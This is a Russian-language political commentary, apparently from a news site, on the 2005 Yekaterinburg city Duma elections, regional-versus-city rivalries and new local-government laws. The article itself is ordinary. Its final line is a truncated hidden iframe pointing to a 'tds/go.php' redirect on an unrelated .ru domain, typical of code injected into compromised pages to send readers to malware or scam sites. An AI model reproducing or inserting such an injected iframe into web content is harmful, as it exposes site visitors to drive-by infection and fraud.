Ажиотаж - более чем за полгода до официального старта кампании — с выборами в Екатеринбургскую городскую Думу (март-апрель 2005 года) наводит на мысли о принципиальных моментах.
Первый. Не получив полномочий, а соответственно, ресурсов при перераспределении их между федеральным центром и регионами (с 2005 года вступает в силу федеральный Закон «Об общих принципах организации законодательных (представительных) и исполнительных органов государственной власти субъектов РФ»), политические и хозяйственные лидеры среднего Урала могут попытаться «отхватить кусок» от екатеринбургского бюджетного пирога.
Под страхом новых обстоятельств и ввиду забрезжившего краха старых методов управления областными финансами уже сейчас идут поиски лояльных областной власти кандидатур для проталкивания их в городскую Думу — в избирательных округах, коль не получилось через партийные списки. Но...
Не раз подмечено, что между резиденцией губернатора (с некоторых пор, считается, более лояльной к городу и стремящейся держать в норме отношения с тем же полпредством) и командой областного премьера (пытающейся, по мнению аналитиков, помешать мирному процессу «в отместку» за свёртывание плана «преемник») есть напряжение. Не исключено, что противоречия толкнут каждую из команд выставить собственных кандидатов во всех либо в большинстве избирательных округов. В этой связи мало кто решится оплачивать кампанию областной власти, «конкурирующей» внутри себя.
С учётом возникших у Алексея Воробьёва сложностей партийного свойства (разлад среди возглавляемых им местных «единороссов»), наблюдатели прогнозируют, что Эдуард Россель может поручить возглавить предвыборный штаб руководителю своей администрации Вениамину Голубицкому. Для последнего такой поворот будет означать стартовый мостик в кресло премьера (либо «вице-губернатора», если правительство в ходе административной реформы возглавит сам губернатор). Впрочем, выбор кандидатур у «областной власти», в какой бы ипостаси она ни выступила, думается, крайне ограничен. Это могут быть те же «уралмашевские» депутаты, либо не менее одиозные силы схожей ориентации.
Второй момент. С 2006 года, с вступлением в силу нового закона о местном самоуправлении, муниципальная власть обретёт более чётко очерченный, чем ныне, статус. Сейчас приводится в соответствии с разграничиваемыми между государством и муниципальными образованиями полномочиями законодательная база, в том числе положения Бюджетного, Налогового, Земельного кодексов etc.
Екатеринбург — пожалуй, первый из крупнейших городов России, где выборы пройдут уже по новому законодательству. Резонно полагать, что и финансово-промышленные группы (в данный момент называют 5-6 ФПГ) также выставят своих кандидатов в Думу. Большинство из них, скорее всего, будет дистанцироваться от областной власти, потому как в плане бизнеса их интересы очерчены рамками города, а политическая составляющая ориентирована на федеральную повестку. Не секрет, что команду главы Екатеринбурга Аркадия Чернецкого промышленники и бизнесмены воспринимают не только как обязательного партнёра в столице Урала/но и как фактор стабильности в регионе в целом.
Думается, «попытают счастья» некоторые партии, но добыть депутатские мандаты в одиночку им вряд ли будет по силам. Так что, возможно, в некоторых округах ФПГ, партии и, скажем, «блок городской власти» выставят единых кандидатов. Это «в-третьих».
Однако традиционно для Екатеринбурга своих кандидатов в представительный орган выставит само городское сообщество. Они могут состоять в «блоке городской власти»; идти самостоятельно; представлять партии и общественные движения, структуры бизнеса и науки, культуры, образования, здравоохранения и т.п. Главное — это должны быть люди, составляющие славу уральской столицы. Чем скорее горожане начнут думать над достойными кандидатурами, тем больше гарантий, что в официальной кампании не будут допущены ошибки, могущие навредить Екатеринбургу.
Этот момент — самый принципиальный.
<iframe src="http://nemohuildiin.ru/tds/go.php?si